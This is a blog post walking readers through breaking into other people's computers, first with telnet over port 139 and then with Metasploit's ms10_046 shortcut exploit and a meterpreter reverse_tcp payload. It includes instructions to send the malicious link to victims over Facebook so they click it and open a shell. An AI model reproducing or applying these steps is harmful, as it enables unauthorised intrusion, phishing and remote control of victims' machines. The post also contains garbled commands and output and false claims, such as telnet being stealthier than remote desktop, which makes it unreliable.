Skip to content Skip to sidebar Skip to footer

How to Hack Other People's Computers on a LAN Network Through CMD 2021

– Hacking is one of the actions that some people avoid and even fear.

People are usually afraid of becoming a victim of hackers because such actions can harm them.

Although not all types of hacks are prohibited, because there are some hacking activities that are also allowed even the fees are very expensive.

Like looking for bugs or weaknesses in some big companies, especially in the technology sector.

But what we want to discuss this time is how to hack other people’s computers connected in a LAN network via CMD.

We discussed how to hack this, because CMD can be used even if the target is far away.

In addition, there are many other advantages possessed by CMD that make many people interested in learning about it.

Instead of being curious, let’s just look at the following review on how to hack other people’s computers on a LAN network via CMD.

How to Hack Other People’s Computers on a LAN Network Via CMD

1. How to Hack Other People’s Computers on a LAN Network Via CMD Using Telnet

How to Hack Other People's Computers on a LAN Network Via CMD
How to Hack Other People’s Computers on a LAN Network Via CMD Using Telnet

Telnet is one of the supporting facilities that are widely used by hackers to remotely PC in a network via CMD.

Meanwhile, to enter other people’s computers usually through the IP Address.

However, the telnet command also sometimes fails because the configuration has not been enabled.

For that, before use, first activate the telnet configuration so that it can be used.

Basically the telnet command is similar to the remote desktop command, but telnet is safer because it will not be known when the computer is taken over to another computer.

If you can use telnet, you can automatically control the computer, guys.

Meanwhile, how to hack other people’s computers on a LAN network via CMD using telnet is as follows:

1. Check telnet configuration

For the first step, please check the telnet configuration on your computer by pressing the Windows key + R (click Run – type CMD then click OK) and wait for the Dos display to appear.

Then check what computers are running, to make sure whether the telnet function is running or not. If so, please type the following command:

-net view, checks which network (host) is currently active.

Then try to check which ports can be hacked or hacked into the PC.

Also pay attention to Foreign Address, because in that section you will get an open port with port 139.

If so, please try to telnet (space) the destination IP (space) Port number:
telnet 192.168.16.66 139

2. Trying telnet

After the above steps are complete, it is time to try telnet PC03 which is the same way as above, namely 192.168.16.8 (enter).

If the process is successful, a display like the following will appear:
C:Documents and SettingsAdministrator>net view

Server Name Remark

/PC03 lpkid


/SERVER


/SERVER-2003


The command completed successfully.


C:Documents and Settings Administrator>ping 192.168.2.22


Pinging 192.168.2.22 with 32 bytes of data:


Request timed ot


Replay from 192.168.2.22: bytes=32 time<1ms TTL=128


Replay from 192.168.2.22: bytes=32 time<1ms TTL=128


Request timed out


Ping statistics for 192.168.2.22:


Packet: Sent = 4, Received = 2, L 2ost = 2 (50% Loss),


Approximate round trip times in milli-seconds:


, L


Minimum = 0ms, Maximum = 0ms, Average = 0ms


C:Documents and SettingsAdministrator.telnet 192.168.2.22


Welcome to Microsoft Telnet Client


Escape Character is ‘CTRL+]’


You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send anyway(y/n): n (enter n, then enter)


Welcome to Microsoft Telnet Service


Login:……


Password: ******


Welcome to Microsoft Telnet Server.


C:Documents and Settingsadmin>


Please check to make sure that you are already on the PC03 computer by checking the following IP:

Welcome to Microsoft Telnet Server.


C:Documents and Settingsadmin>ipconfig


Windows IP Configuration


Ethernet adapter Local Area Connection 2:


Connection-specific DNS Suffix . :


IP Addresses. . . . . . . . . . . . . . . . . . : 192.168.2.22


Subnet Masks . . . . . . . . . . . . . . . . . : 255.255.255.0


Default Gateways . . . . . . . . . . . . . . . : ?


C:Document and Settingsadmin>

In order to enter, the telnet service must be activated first, then the new admin/client may telnet.

Now you can control the computer that is being controlled, for example to restart it by:

C:Documents and Settingsadmin>shutdown/?

Usage: shutdown [ – i / -l / -s / -r / -a] [ -f] [ -m

computername] [ -t xx] [-c”c[-c”c

2. How to Hack Other People’s Computers on a LAN Network Via CMD Using Linux Terminal

How to Hack Other People's Computers on a LAN Network Via CMD
How to Hack Other People’s Computers on a LAN Network Via CMD Using Linux Terminal

Hacking a computer in a LAN network via CMD using a Linux terminal is considered more complex in terms of tools when compared to Windows XP 7, 8 and 10.

But you must be connected to the internet network to be able to connect to other people’s computers via IP addresses.

Because without an internet connection, of course you will not be able to connect to the computer system and the hacking process will not be possible.

How to hack using a Linux terminal is also quite popular, especially among hackers because it has many advantages.

As for how to hack other people’s computers on a LAN network via CMD using a Linux terminal, as in the following review:

1. Open metasploit in CMD or Backtrack terminal

  • Please download metasploit first via the following link (Download Metasploit) Then open CMD and run metasploit after it has been successfully downloaded.
  • Then type the command “cd (location directory)“, for example the location is in cd c:/metasploit then press enter.
  • Then type the next command, namely sudo chmod +x (metasploit name) and press enter.
  • The next command is sudo ./(metasploit name) and press enter.
  • Followed by typing the following command msfconsole and press enter.
  • Then type use exploit/windows/browser/ms10_046_shorcut_icon_dllloader

2. Knowing the IP address of the target computer

To see the computer’s IP, please type iconfig then set srvhost (your IP address) press enter and set lhost (your IP address).

Then type too PAYLOAD SET

windows/meterpreteer/reverse_tcp press enter.

Meanwhile, to find out whether the process is successful or not, please type show options then type exploit. Then you will get the IP url like the url address http:192…??.

Next, send the url address via Facebook which will be the target of the hack so that the address is clicked later.

To find out whether the target clicks on the address that has been sent or not, please type sessions -i and type back sessions -i 1.

3. How to hack someone else’s computer

You will see which computers have clicked on the url address that was sent earlier after sessions -i typed.

Then the hack process can already be started by typing shell sysinfo and you will see various folders or directories on the target computer.

The final word

That’s how to hack a computer in a LAN network via CMD that can be learned.

It is recommended to use this hack method wisely so that no party is harmed.

If you want to try it, you can apply it on your relative’s or friend’s computer but must get approval first

Post a Comment for "How to Hack Other People's Computers on a LAN Network Through CMD 2021"